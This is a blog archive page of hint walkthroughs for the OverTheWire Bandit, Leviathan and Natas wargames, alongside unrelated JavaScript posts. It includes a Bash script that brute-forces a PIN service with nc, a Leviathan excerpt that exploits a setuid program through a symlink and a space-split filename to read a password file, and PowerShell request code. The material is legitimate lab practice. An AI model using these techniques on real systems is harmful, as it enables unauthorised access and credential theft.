Posts

Showing posts from May, 2018

OverTheWire[.com] Natas Walkthrough - JUST HINT, NO SPOILERS

game portal: http://overthewire.org/wargames/natas/ PASSWORDS for each level are stored in /etc/natas_webpass/natasX I made this walkthrough for people like me, i needed some help, but didnt want the spoiler, so here i will give you all the information needed to pass each level, yet not the solution. For levels needed custom web request i made a different post for powershell and javascript  with how-to's, since is a piece of learning for itself, and also for those of us that play at work and have only powershell at their hands. Although its not a complete spoiler there, its quite most of the solution so try yourself 1st. Natas The Natas game is from basic to advances web hacking. Every few levels is about whole new exploitation (with some harder ones doing comeback later), so a lot of learning. If you're new, you're the reason i am writing so much even for the 1st level, just please google EVERY topic you see, since in the following levels i assume you know the ...

Natas Powershell and JavaScript Helper (OverTheWire)

I did most of Natas from work, and there i couldn't have anything but Windows PowerShell, or the browser's console for Javascript, so here are examples how to use it for the game for anyone in the same position. SPOILER ALERT even though i tried not to have this a the solutions, its kinda the solution. Level 4: HTTP Headers # basics for working with .Net WebClient # create a variable with a value $u = "http://natas4.natas.labs.overthewire.org" # creating new Object you need to specify the full namespaces and classes route $wc = New-Object System.Net.WebClient # this is how you send user and pass $c = New-Object System.Net.NetworkCredential( "natas4" , "............" ) $wc .Credentials = $c # adding headers. # # adding a cookie is just "cookie", "name=value". $wc .Headers.Add( "header-name" , "header-value" ) # download the same html you see in "view-source". # you c...

Javascript Event Oriented Programming example on SPSocialFeed

SPSocialFeed is the sharepoint microblog, where you can post your thoughts and reply on yourself and other. We wanted to add some functionalities for every reply and post added, so i used the new  "MutationObserver" and "CustomEvent"  new API's in ES6 to create an event-full way to implement solution // batman is the man in-charge catching the bad guys in the night. // so now he catches the good events in the feed let batman = ( function (){ let config = { childList : true }; let batman = class batman{ constructor(){ this .v = "2.0.0" ; //register call to batCave fn. to _spBodyOnLoadFunctionNames, the SP onready _spBodyOnLoadFunctionNames.push( 'batman.batCave' ); } batCave(){ let feed = document.getElementById( 'ms-feedthreadsdiv' ); //childNodes can be any type of nodes, like text node. children is only HTML...

Javascript Expost Interface Implementation

For some time i've been thinking, how can i export a JS object that will expose only public functions, yet will keep all my million functions "hidden" just to make it less messy.. The point is to create an anonymous function and create the instance within, while returning a new object with members pointing at the instance functions with ".bind" to the instance. So here it is let encapsulated = ( function encapsulated_builder(){ let encapsulated = class encapsulated{ constructor(){ this .food = 'bamba' ; this .animal = 'lion' ; } addFood(f){ this .food += ' ' + f; } addFoodByAnimal(a){ switch (a){ case 'dog' : this .addFood( 'bone' ); break ; case 'cat' : this .addFood( 'fish' ); break ; } } addAnimal(a){ this .animal += ' ' + a; this .addFoodByAnimal(a); } printFood(){ ...

OverTheWire[.com] Leviathan Walkthrough - JUST HINT, NO SPOILERS

game portal: http://overthewire.org/wargames/leviathan/ PASSWORDS for each level are stored in /etc/leviathan_pass/leviathanX Leviathan The Leviathan game is about basic debug/hack/trace binary files in linux, and how to exploit them. The main tool you will be using here is ltrace , so read & google about it. Use it in ALL levels except Level 0, even if i don't mention it. Another important note is that most of the files have the " s " flag in their permissions, meaning they run in elevated privileges, and that's important to understand the solutions. Go read about that too. Level 0: Bookmarks bookmarks.html is the file chrome creates when you export all your bookmarks, people can save sensitive info there. Level 1: Introduction to " ltrace " Time to use " ltrace ". Level 2: Exploiting " cat " Most of the tutorials out there are out of date, exploiting symbolic links, and exploit " cat ". You can stil...

OverTheWire[.com] Bandit Walkthrough - JUST HINT, NO SPOILERS

overthewire bandit walkthrough - JUST HINT, NO SPOILERS, just all the hints you need. I made this walkthrough for people like me, i needed some help here and there, but didnt want the spoiler, and even some blogs like  https://www.yalpski.net/  (mentioned with appreciation) that have the solution collapsed, there is no help if i dont know what to do, just need some pointers. so lets go game portal is http://overthewire.org/wargames/bandit/ Bandit The bandit  game is mostly introduction to ssh, bash shell and their tricks Pre Level 0: Connect to SSH If you use linux, your command is " ssh " and thats it. For windows you'll need to download a software, it's in the Level 0 hints  (wikihow) eventually you need to learn more about the ssh command, but the basic is that connection is defined as " ssh <user>@<domain> -p <port> " CTRL+C to break process, CTRL+D to exit from current user's shell I wrote this one down since i co...

OverTheWire Bandit24 script

rm out p=`cat /etc/bandit_pass/bandit24` echo $p ln=$"\r\n" echo "0-999" i=0 until [ $i == 1000 ] do   n="0$i";   until [ ${#n} == 4 ]   do     n="0$n"   done   echo "$p $n"   res=$(echo -n "$p $n" | nc localhost 30002) >> out   echo "res: $ln $res"   ((i++))   if [[ $res =~ .*Correct.* ]]   then     i=25000     break n   fi done until [ $i == 10000 ] do   echo "$p $i"   res=$(echo -n "$p $i" | nc localhost 30002) >> out   echo "res: $ln $res"   if [[ $res =~ .*Correct.* ]]   then     break n   fi   ((i++)) done

leviathan level 2 overthewire - updated challenge

leviathan 2 overthewire setreuid(12002, 12002) start by making a folder with our "mktemp -d" , make a file, and ltrace ./printfile <your file> most tutorials will show you how to get this done with a link file, which are good tutorials and test cases as they are, read them. trying that...  INSIDE our tmp folder ln -s /etc/leviathan_pass/leviathan3 /tmp/tmp.ydhTgRu2oq/b ltrace ~/printfile /tmp/tmp.ydhTgRu2oq/a\ b will output system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1 /bin/cat: b: Permission denied this is because these 2 lines geteuid()  setreuid(12002, 12002)  but, i guess that was not the hack, and in the end we see that the final line executing is anyway, like above or doing just a file named " a b " and another named " b " will output system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1 /bin/cat: b: No such file or directory the important thing " cat " command did try to concat. but to the real hack...